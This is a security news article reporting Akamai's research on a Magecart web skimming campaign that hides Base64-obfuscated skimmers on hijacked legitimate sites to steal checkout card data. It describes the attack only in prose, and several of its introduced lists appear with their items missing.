This strategy enables them to illicitly implant and conceal skimming malware within specific eCommerce websites.
During the checkout process, hackers execute a Magecart attack by breaching online stores and implanting malicious scripts designed to stealthily harvest the customers’ credit card details and personal information.
As per the diligent monitoring conducted by Akamai’s researchers on this particular campaign, numerous organizations in the subsequent countries have fallen victim to compromise:-
In addition, the cybersecurity firm highlights a noteworthy observation that many victims remained clueless to the fact that they had been compromised for more than a month, showing the covert nature of these attacks.
Web skimming attacks pose significant threats to organizations operating in the digital commerce realm, carrying the potential for substantial harm and adverse consequences.
The cybersecurity analysts at Akamai identified that threat actors had exploited several major platforms, and among them, we have mentioned the major ones:-
A striking aspect of this campaign lies in the meticulous arrangement of the attackers’ infrastructure, specifically devised to orchestrate the web skimming campaign with remarkable efficacy.
In a strategic departure from conventional methods, instead of relying on their own command-and-control (C2) server, which could potentially raise suspicion as a malicious domain, the attackers adopt a different approach.
By exploiting vulnerabilities or employing any available means, they infiltrate susceptible and legitimate websites, particularly small or medium-sized retail platforms, where they covertly embed their malicious code.
At its core, this campaign generates a dual impact, resulting in two distinct sets of victims, and here they are:-
During their investigation, Akamai researchers identified a limited selection of websites functioning as the primary targets, all of which exclusively pertained to commerce-oriented platforms.
Exploited host websites are used as hosts for malicious code and subjected to a Magecart-style web skimming attack, leading to the theft of user information.
The attack’s stealthiness is enhanced by threat actors obfuscating the skimmer with Base64 encoding, concealing the host’s URL, and structuring it to resemble trusted third-party services like Google Tag Manager or Facebook Pixel, minimizing suspicion.
Through this approach, the attacker implements three distinct techniques aimed at evading detection and remaining undetected, and here they are mentioned below:-
The domain employed in the attack is obfuscated, rendering it challenging to trace and identify.
The loader is disguised as an authentic third-party script or vendor, hiding its true malicious intent.
By sourcing a substantial portion of the code from alternative origins, the attacker minimizes the volume of injected malicious code on the page, significantly diminishing the likelihood of detection.
The attacker uses obfuscation to impede debugging and research, deliberately making it difficult to understand the attack’s exact sequence, a practice widely adopted in various web skimming attacks that, in recent years, has become increasingly popular.
The first version is a highly obfuscated form that includes a customized list of CSS selectors specifically designed for each targeted site to capture customer PII and credit card information.
The second variant of the skimmer possessed lesser protection, inadvertently revealing key indicators within its code.
These crucial clues allowed Akamai to effectively map the extent of the campaign’s impact and discover further victims.
Following the successful extraction of customers’ details, the skimmers transmit the stolen data to the server under the control of the threat actor.
While this transmission is facilitated through an HTTP request meticulously crafted as an IMG tag nested within the skimmer.
Base64 encoding is used to obfuscate data during transmission, while website owners can prevent Magecart infections by securing admin accounts and updating CMS and plugins, and customers can reduce data exposure risk by utilizing the following methods:-
Here Below we have mentioned all the recommendations:-
Struggling to Apply The Security Patch in Your System? –
Try All-in-One Patch Manager Plus
In a resounding triumph for justice, U.S. District Judge Kathryn Kimball Mizelle has sentenced Vitalii…
Hackers are plotting to benefit from the generosity of Halloween, Thanksgiving, and Christmas shoppers using…
The LLMs (Large Language Models) are evolving rapidly with continuous advancements in their research and…
In the dynamic realm of mobile application security, cybercriminals employ ever more sophisticated forms of…
A recent campaign has been observed to be delivering DJvu ransomware through a loader that…
In a pivotal update to the Okta security incident divulged in October 2023, Okta Security…